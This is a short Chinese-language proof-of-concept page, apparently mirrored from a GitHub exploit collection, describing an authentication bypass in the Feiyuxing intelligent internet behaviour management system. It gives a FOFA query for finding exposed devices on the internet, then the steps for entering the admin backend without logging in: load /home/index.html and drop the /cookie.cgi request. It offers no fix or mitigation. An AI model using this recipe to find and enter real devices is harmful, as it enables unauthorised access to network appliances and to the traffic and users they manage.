mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 21:04:50 +08:00
29 lines
1.0 KiB
Markdown
29 lines
1.0 KiB
Markdown
|
|
# 飞鱼星智能上网行为管理系统存在权限绕过漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞详情
|
|||
|
|
飞鱼星智能上网行为管理系统存在权限绕过漏洞
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ 飞鱼星智能上网行为管理系统
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ fofa`<font style="color:rgb(51, 51, 51);">title="飞鱼星企业级智能上网行为管理系统"</font>`
|
|||
|
|
+ <font style="color:rgb(51, 51, 51);">特征</font>
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
/home/index.html
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
看见/cookie.cgi时,丢弃即可进入后台
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-09-03 14:56:23
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lnnzlk47niwbf02n>
|